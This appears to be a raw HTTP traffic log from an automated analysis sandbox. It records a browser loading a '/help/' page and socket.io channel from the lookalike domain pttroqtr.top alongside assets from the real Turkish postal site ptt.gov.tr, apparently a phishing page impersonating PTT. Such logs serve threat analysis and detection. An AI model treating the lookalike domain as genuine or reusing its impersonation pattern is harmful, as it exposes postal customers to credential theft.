Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjcVA&sid=H_Y22m0FJjANkstPAEf3 HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjcF_&sid=H_Y22m0FJjANkstPAEf3 HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/50.png HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjcG1&sid=H_Y22m0FJjANkstPAEf3 HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/51.png HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/49.png HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/47.png HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/52.png HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/48.png HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/46.png HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Sayfalar/Posta/DigerPostaIslemleriUst.aspx HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/fdc30eafd5b8da2a.css HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/53.png HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/54.png HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/50.png HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/51.png HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/52.png HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/53.png HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/layout/images/54.png HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/OmnesRegular.2b095194.otf HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.ptt.gov.trsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.ptt.gov.tr/_next/static/css/fdc30eafd5b8da2a.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/fa-solid-900.ce4938a3.woff2 HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.ptt.gov.trsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.ptt.gov.tr/_next/static/css/fdc30eafd5b8da2a.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/fa-brands-400.e465758e.woff2 HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.ptt.gov.trsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.ptt.gov.tr/_next/static/css/fdc30eafd5b8da2a.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-45e080b2c6cac5da.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/framework-0438cefc59f69f60.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-8430b752c8e66574.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjd67 HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_app-a58333aebeb24bd1.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-45e080b2c6cac5da.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=ZtwaiGyEO0D_jrEhAEf6 HTTP/1.1Host: pttroqtr.topConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://pttroqtr.topSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: 6rgGU/d4mNfxc4Rf8QarNQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjd67 HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjdTo&sid=ZtwaiGyEO0D_jrEhAEf6 HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/3nPo4dxLHf5a0RshtsAsa/_buildManifest.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_error-32d9baaae5c99c79.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/3nPo4dxLHf5a0RshtsAsa/_ssgManifest.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/3nPo4dxLHf5a0RshtsAsa/_middlewareManifest.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjdin&sid=ZtwaiGyEO0D_jrEhAEf6 HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjdTi&sid=ZtwaiGyEO0D_jrEhAEf6 HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjdTo&sid=ZtwaiGyEO0D_jrEhAEf6 HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-8430b752c8e66574.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/framework-0438cefc59f69f60.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjd-1&sid=ZtwaiGyEO0D_jrEhAEf6 HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjdin&sid=ZtwaiGyEO0D_jrEhAEf6 HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.tr HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjdiu&sid=ZtwaiGyEO0D_jrEhAEf6 HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
